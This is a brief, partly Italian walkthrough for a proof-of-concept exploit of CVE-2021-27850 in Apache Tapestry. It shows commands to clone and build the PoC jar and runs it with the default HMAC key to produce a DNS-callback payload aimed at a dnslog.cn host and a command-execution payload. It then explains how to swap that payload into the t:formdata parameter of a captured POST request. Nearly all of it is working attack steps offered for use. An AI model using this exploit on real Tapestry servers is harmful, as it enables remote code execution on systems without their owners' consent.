
Apache Tapestry CVE-2021-27850 PoC
git clone https://github.com/Ovi3/CVE_2021_27850_POC.git
cd CVE_2021_27850_POC/
gradlew runnbaleJar
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar
[Usage]:
java TapestryExploit [Tapestry Key] DNS [URL]
java TapestryExploit [Tapestry Key] CB2 [Command]
# Supponendo che la chiave hmac sia change this immediately
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" DNS "http://xxx.dnslog.cn"
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" CB2 "calc"
Accedi all'applicazione Tapestry, attiva una richiesta POST (es. richiesta di login), cattura il pacchetto, modifica il valore del parametro t:formdata con il payload generato sopra.